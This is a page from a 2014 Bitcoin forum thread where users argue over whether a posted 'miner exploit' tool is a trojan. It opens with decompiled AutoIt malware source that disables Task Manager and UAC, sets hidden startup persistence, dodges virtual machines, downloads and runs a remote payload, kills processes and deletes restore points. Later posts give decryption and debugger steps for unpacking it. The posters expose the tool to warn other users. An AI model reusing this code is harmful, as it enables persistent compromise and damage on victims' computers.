RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc

Func fakemessage()
$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc

Func mutex()
$scriptname = "lmsqQw.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc

Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc

Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc

Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
$autoit3 = "lmsqQw.exe"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc

Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc

Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc

Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc

Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc

Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc

Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc

Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc

Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc

Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]

[SNIP]
-----------------
[SNIP]

Func loop()
While 1
If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc

Yeah, why should I bother run this in a vm Huh?

Nice game OP... but you loose !

Are you kidding me or what? Did you really just post the crypter's source?!
What the hell has this to do with my source Huh
The source you just posted proofs that none of the functions included, except the anti virtuals, are being used.

Quote
That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...

If you didn't even see that one, even after decompiling the exectuble, well, i'm sorry, but your unskilled then.
Plus, if you followed the topic, i explicitly posted about crypting the source.

Now for the last time, stop spamming my topic. I've had enough of your makes-no-sense posts here.
If you really think you are all that mighty, then PM as i asked you, and we'll compare our sources.

Then once again, you will be disapointed by yourself. For the third time in row.


The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
bitpop
Legendary
*
Offline Offline

Activity: 2912
Merit: 1060



View Profile WWW
January 28, 2014, 03:41:13 PM
 #110

Show him lemmy, don't hold back.

steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 28, 2014, 04:19:55 PM
 #111

Here are my beliefs

ici_lemmy does not even own mining equipment.

Because, instead of trying out if he's rigs are exploitable yes or no, he straight goes to decompiling all files.
Since he made not a single post in this thread before i posted my tool, i believe he was just waiting to try and exploit my tool in order to do nasty stuff with it.

Why else decompile before trying...

Dozens of PM's regarding this kind of "users" (i prefer the term hacker, but what's in a name...) are submitted to me by concerned miners.

For this reason, none of the exploit code can be found inside the main executables.
I also crypted the files to prevent a run while sniffers are active, or virtual enviroments are detected.
This was also posted by me before posting the tool.

As ici_lemmy himself posts, he is disapointed by himself. Why?
Because for the third time in a row he posts decompiled code that does... nothing at all!

This proves to me his eager to get to the core files to abuse them.

If i had a program that was as evil as he tries to picture it, i whould have deleted it by now.
Seems also logic that any AV/AM/FW scanner picked it up by now.

So for the last and final time:

IF YOU ARE PLANNING ON ABUSING THE SOURCE.. GET LOST, YOU CANT.
IF YOU ARE PLANNING ON POSTING BULLSHIT FOR NOT BEING ABLE TO EXTRACT THE SOURCE.. GET LOST.
IF YOU WANT TO TEST YOUR MINING EQUIPEMENT.. FEEL FREE TO DOWNLOAD AND TEST RUN and THEN POST YOUR FINDINGS.

I will no longer reply to any scriptkiddie out there, trying to get hold on the source, tested, approved and verified by KnC itself, to start hacking some machines.

As stated before, this is the kind of behaviour that makes me want to keep all next exploits to myself instead of sharing them.
I would have been better of just mining with your rigs, smiling while reading your posts about it...

Thank you

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
Chancellor
Full Member
***
Offline Offline

Activity: 154
Merit: 100


View Profile
January 28, 2014, 04:37:49 PM
 #112

Here are my beliefs
And what if...

1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP.
2. You've made fuss about it here.
3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.

Bullshit? Maybe.

Impossible? Don't think so. Time will tell.

IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.

BTC: 1GRx2H5esyFTucZCt1eX9tjpoqfMrbVHMT
ici_lemmy
Member
**
Offline Offline

Activity: 75
Merit: 100


View Profile
January 28, 2014, 04:41:20 PM
Last edit: January 28, 2014, 04:55:16 PM by ici_lemmy
 #113

@steve15 : I'm disapointed by myself because I have not exposed you earlier...

For the analysis, quick answer because I have no more time to loose on this...

OK, so here is my simple full process to expose the scam (so everyone with skills can do it) :
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal

and here are the virustotal results :
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50

Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me !

@admin : you should remove the link to the tool and ban steve

Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 28, 2014, 06:11:08 PM
 #114

Here are my beliefs
And what if...

1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP.
2. You've made fuss about it here.
3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.

Bullshit? Maybe.

Impossible? Don't think so. Time will tell.

IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.


You are right about some parts.

1. If the vulnerability is minor, would KnC upgrade their firmware? It is not just the public IP miners who are in danger
2: If i prepared a malicious software to take control over users miner, would i really opt for an EXE file you think?

Preparing malicious software, and binding it in a simple PDF file, where i claim to describe the method would be far more efficient for that purpose.

People are not suspicious about a PDF, and they need to open it anyway.

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 28, 2014, 06:22:01 PM
Last edit: January 28, 2014, 06:38:31 PM by steve15
 #115

@steve15 : I'm disapointed by myself because I have not exposed you earlier...

For the analysis, quick answer because I have no more time to loose on this...

OK, so here is my simple full process to expose the scam (so everyone with skills can do it) :
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal

and here are the virustotal results :
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50

Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me !

@admin : you should remove the link to the tool and ban steve

Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability


You really are an idiot, excuse my language.

Try this:

- Download whatever executable file online, for example Firefox installer.
- Scan with virustotal = 0/50
- Disasemble the exe or rar
- Remove the commented lines
- Modify the script to have the contents of the installer
- Remove some lines
- Send the decrypted file to virustotal = bam, at least 40/50

Every single executable known file in virustotal that gets modified with even 1 bit will get an instant alert.
That is the main reason why you cant fake EXE file assembly without triggering an alert.

Also notice our hashes:

My hash : A5F3453E03DD2E4F356BEC7FB595B799A8EA6BE2C0466CE8550C74E247511870
Your hash: abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3

You scanned a "*.BIN" file. You could have uploaded WHATEVER file you wanted to upload.
Hashcheck is not the same, so it is not the same file, period. That's called faking results.

You file contains at lease 15 DLL files that are not even present in my code!

THIS are the files included:



Try this second method:

Create any .NET project
Google some UPnP / network scanning methods/modules/classes
Compile and send to virustotal = bam, 40/50

So please, you have no idea what you are talking about.
You still failed to post the actual exploit code also.

You post the source from the crypter ITSELF to scare people, but you also fail to post the configuration file for it, so they can see i'm not using ANY of these 'scary' functions.

At most, you can be considered a medium skilled cracker, but that is where this story ends for you ici_lemmy.
Cracking, hacking and decompiling is more than running some cracked tools you found on thepiratebay.

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
ici_lemmy
Member
**
Offline Offline

Activity: 75
Merit: 100


View Profile
January 28, 2014, 06:38:54 PM
 #116

As I said, I have no more time to loose with that...
I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...

Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 28, 2014, 06:40:48 PM
 #117

As I said, I have no more time to loose with that...
I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...

Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...

Just explain why you upload a whole different file, containing over more than 15 DLL files that are NOT in my file.
Explain why your upload contains a Remote Service Application for example.

Your posts are worth nothing dude. Get lost. And see my edits above in my last post.

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
Chancellor
Full Member
***
Offline Offline

Activity: 154
Merit: 100


View Profile
January 28, 2014, 07:20:10 PM
 #118

Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more i can do...
Regardless of what is really contained in this file (and it looks fishy indeed), the above quote is the most important thing. Steve15, if you wanted to play fair, you should disclose the vulnerability as a whole and in detail. Then:
1. Miners would know what the danger really is, without running some encrypted, suspicious executables. Then they can react fast and protect their rigs.
2. KNC would be forced to patch their firmware quickly, if really needed.
3. You would be acknowledged as the discoverer and would show your real pentesting skill.
I would go for disclosure, especially as you said that KNC tried to hide the problem under the carpet. Instead, the fact is the whole story is directed by you in a way that try to encourage people to run some encrypted, probably dangerous, application. As ici_lemmy said, if they are dumb enough, well...

BTC: 1GRx2H5esyFTucZCt1eX9tjpoqfMrbVHMT
nuno12345
Sr. Member
****
Offline Offline

Activity: 276
Merit: 284


View Profile
January 28, 2014, 10:39:43 PM
 #119

One last shot...

AutoIt script MD5 pass: 1baba19a29b940f09293c9f47030d79c

AutoIt script, encrypted code:
Code:
">>>AUTOIT SCRIPT<<<"
"wb"
"%.15g"
"0x%p"
"True"
"False"
"%s (%d) : ==> %s.: %s %s"
"Line %d:"
"Line %d  (File "%s"):"
"Error: "
"AU3_FreeVar"
....
"SeDebugPrivilege"

More at 001FE0D0

Processor/virtual env check
Address=001A6A16, Destination=kernel32.IsProcessorFeaturePresent

Debugger check stages
Address=0019D7C6, Destination=kernel32.IsDebuggerPresent
Address=001A7DB7, Destination=kernel32.IsDebuggerPresent
Address=001B1EE1, Destination=kernel32.IsDebuggerPresent

I guess your autoit exe has all the protection on the exe itself and an additional encryption on the AutoIt script inside, but your file needs to run it so it must know the password or how to decrypt it.

Long long shot, open Exe2Aut in a debugger (you'll need to unpack it with UPX first). Breakpoint at 0x004026B9 and hit the "Decompile" button. When the debugger breaks you will have the password at the top of the stack.
ici_lemmy
Member
**
Offline Offline

Activity: 75
Merit: 100


View Profile
January 28, 2014, 11:05:58 PM
 #120

Linux :
Code:
$unzip minerProofOfConcept.zip
$unrar e minerProof.exe
$sed '/^;/d' crLyJ > tmp.au3
$nano tmp.au3
$//^^modify to keep only _crypt_* funtions and code call to _crypt_decryptdata with good param
$cp * /windows/

And under windows :
Code:
>lmsqQw.exe tmp.au3

Send the resulting file to any antivirus...

You'll see yourself
Pages: « 1 2 3 4 5 [6] 7 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!